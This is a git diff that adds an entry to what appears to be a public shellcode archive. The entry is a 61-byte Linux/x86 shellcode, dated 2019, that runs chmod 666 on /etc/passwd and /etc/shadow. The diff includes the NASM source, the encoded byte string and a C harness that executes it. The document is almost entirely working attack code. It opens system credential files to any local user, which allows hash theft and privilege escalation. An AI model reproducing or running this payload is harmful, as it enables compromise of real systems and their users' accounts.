b/shellcodes/linux_x86/47108.txt new file mode 100644 index 000000000..e465d6cba --- /dev/null +++ b/shellcodes/linux_x86/47108.txt @@ -0,0 +1,64 @@ +# Exploit Title: Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow (61 bytes) +# Date: 10/07/2019 +# Exploit Author: Xavier Invers Fornells +# Contact: x4v1s3c@gmail.com +# Tested on: Debian 4.19.28 +# Architecture: x86 +# Size: 61 bytes + + + +#################################### chmod.nasm #################################### + +global _start +section .text + +_start: + push byte 15 + pop eax + push byte 0x64 + push word 0x7773 + push 0x7361702f + push 0x6374652f + mov ebx, esp + + push word 0x1b6 + pop ecx + + int 0x80 + + push byte 15 + pop eax + push byte 0x77 + push word 0x6f64 + push 0x6168732f + push 0x6374652f + mov ebx, esp + + push word 0x1b6 + pop ecx + + int 0x80 + + push byte 1 + pop eax + int 0x80 + +#################################### shellcode.c #################################### + +#include +#include + +unsigned char code[] = \ +"\x6a\x0f\x58\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x0f\x58\x6a\x77\x66\x68\x64\x6f\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80"; + +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file